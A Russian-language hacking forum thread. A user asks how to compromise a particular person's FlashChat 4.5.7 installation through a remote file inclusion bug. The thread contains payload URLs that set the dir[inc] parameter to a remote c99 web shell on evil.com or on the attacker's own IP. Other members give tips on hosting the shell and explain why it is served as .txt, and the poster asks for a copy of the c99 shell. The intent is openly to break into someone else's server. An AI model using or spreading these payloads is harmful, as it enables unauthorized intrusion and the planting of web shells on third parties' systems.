Приветствую!!!

Вобщем есть такой вопросец хотел нагнуть FlashChat v 4.5.7 нашел баг под него на складе сайта www.milw0rm.com

Код:

http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt?

Видео данной уязвимости:

http://rapidshare.de/files/31362430/Flashchat.rar.html

------------------------------------------------------------------------------------------------

Ставлю я значит себе denwer кидаю туда вебшелл с99 и прописываю вот это:

http://ип_цель/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://ип_мой/c99.txt?


Идет запрос и шелл не хочет грузиться попробоал убрать [inc]

На это вебсерв отрыгивает такое:


Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(hdb.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Fatal error: main(): Failed opening required 'hdb.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13


Есть небольшой ньюанс на компе_цели как я понял стоит фаирвол который пропускает не все подряд а именно разрешенные приложения админом..
может быть в этом дело ?!

Т.е его ip даже не пингуется... а как я понял баг работает по принцыпу бэкконекта
и возможно фаир рубит это дело на корню..

Вобщем или я туплю или чтото не так делаю :)

Пролейте свет !!!!!!


Вопрос в догонку :)

Честно гворя я не совсем понимаю почему в етом баге шелл должен быть в виде .txt а не в .php

Не нужно ли мне случаем чтобы мой вебсерв обрабатывал .txt как скрипты php ?!

ну вопервых денвер сначала надо настроить чтобы он смотрел в инет.

кидай в директорию c:/webservers/home/your_site/
файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться)

содержанием

# dnwr_ip 127.0.0.2 <-- вместо 127.0.0.2 вписывай свою ип при подключении к инету и делай ребут апача
# dnwr_host custom-host
# dnwr_port 80

Есть небольшой ньюанс на компе_цели как я понял стоит фаирвол который пропускает не все подряд а именно разрешенные приложения админом..
может быть в этом дело ?!
Файр не файр но он не должен блокировать запрос скрипта на инклуд.

Честно гворя я не совсем понимаю почему в етом баге шелл должен быть в виде .txt а не в .php

Не нужно ли мне случаем чтобы мой вебсерв обрабатывал .txt как скрипты php ?!

файл не должен обрабатываться на сервере где он лежит(иначе инклудиться будет результат выполнения команды на сервере-хранилище). чат инклудя твой тхт считывает его содержимое и помещает в страницу свою вот тама он и будет обрабатываться.

Вторым постом в теме всё описывается: http://forum.antichat.ru/thread20985.html.
Не знаю что там может быть непонятного. Пробуй сразу на вебе, не мучай себя и денвер. Кстати эту багу уже почти везде закрыли.

ну вопервых денвер сначала надо настроить чтобы он смотрел в инет. кидай в директорию c:/webservers/home/your_site/ файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться) содержанием # dnwr_ip 127.0.0.2 <-- вместо 127.0.0.2 вписывай свою ип при подключении к инету и делай ребут апача # dnwr_host custom-host # dnwr_port 80

Забыл дополнит что все это в местной сетке adsl в тырнет доступа нет...
Но сомо собой я настройил апатчь чтобы он смотрел в
сетку с портом 80 но все равно нехочет цеплять шелл.
Но настройку я делал не через .htaccess а прописал
в httpd.conf есть ли разница ?!

Кстати эту багу уже почти везде закрыли.

Ну может ее много где и закрыли но у етого перца весит именно ета версия и бновлять как я вижу он ее пока не собирается :)

Вторым постом в теме всё описывается: http://forum.antichat.ru/thread20985.html.

Все кокраз так и делаю толко разница втом что шелл посется на моем вебсерваке..

хм. такто разницы никакой. Но поробовать стоит. Этож денвер...

файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться)
создать через експлорер нельзя, через командную строку - не вопрос
echo. > .htaccess

))) Ай блин. сам тупанул. чет даж мысли не возникало...

Пробовал .htaccess создавать неканает :) вобщем странно както
Возможно у него верссия подправленая хз

Хотя на запрос chat/inc/cmses/aedating4CMS.php выдает вот это

Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(db.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Fatal error: main(): Failed opening required 'db.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Пишет что нету такого файла или дирректории. Админ вполне мог их перенести, и изменить адреса подгружаемых файлов чата.

мда... как пробить где они тусят ?!

Скорей всего никак. Он мог их просто переименовать.

Мда жаль если так....хотя знаю его навыки в этом деле обычно у него все по дефолту :))
Но видать это исключение :)

Так где пробить это верссию на офф скорей всего новая...
Поставить себе и логическим путем подумать что он там мог изменить :))

Хотя логики тут маловато будет кто его знает какое ему имя папки взбрело в голову...

Вот что пришло в голову уязвимость скорей всего продемострирована на платной верссии чата а в free версии возможно структура папок другая ?!

Порылся чета нема этой версии :) наврно плохо ищу..

Эти флэшы вроде все бесплатны. По крайней мере до 4.7.0 версии.

Народ !!! подкиньте шелл с99 если можно билд 16 :) ато у меня бета....

А и на щет этой темы..

Короче че получилось поставил я себе етот чат поробовал провернуть взлом локально
Вобщем шелл грузится но както странно толко титульная страница и если пробовать юзать его то выдает следущее

Warning: main(o:\home\non-existent-host/inc/header.inc.php) [function.main]: failed to open stream: No such file or directory in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 12

Warning: main() [function.include]: Failed opening 'o:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 12

Notice: Undefined variable: dir in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 13
[Денвер: показать возможную причину ошибки]
Warning: main(db.inc.php) [function.main]: failed to open stream: No such file or directory in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 13

Fatal error: main() [function.require]: Failed opening required 'db.inc.php' (include_path='.;/usr/local/php/PEAR') in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 13

Я так понимаю что все дело в самой реализации денвера под винду хотя пробовал appwebserv через него такая же фигня o_O